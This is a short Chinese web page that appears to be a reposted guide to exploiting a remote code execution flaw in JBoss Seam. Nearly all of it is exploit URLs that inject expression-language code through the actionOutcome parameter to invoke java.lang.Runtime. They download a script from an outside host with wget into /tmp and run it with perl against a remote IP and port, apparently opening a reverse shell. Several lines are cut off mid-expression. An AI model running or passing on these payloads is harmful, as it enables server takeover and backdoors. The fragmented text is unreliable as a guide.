jboss seam 远程执行漏洞利用步骤
目标:http://www.ip.com ('java.lang.Runtime').getDeclaredMethods()[6]} http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName ('java.lang.Runtime')}.getDeclaredMethods()[13]} http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName ('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName ('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),'wget http://www.bitpress.com.cn/uploads/back.py -O /tmp/back.py')}
('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName ('java.lang.Runtime').getDeclaredMethods()[6].invoke(null),'perl /tmp/back.py 118.122.176.42 53')} (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |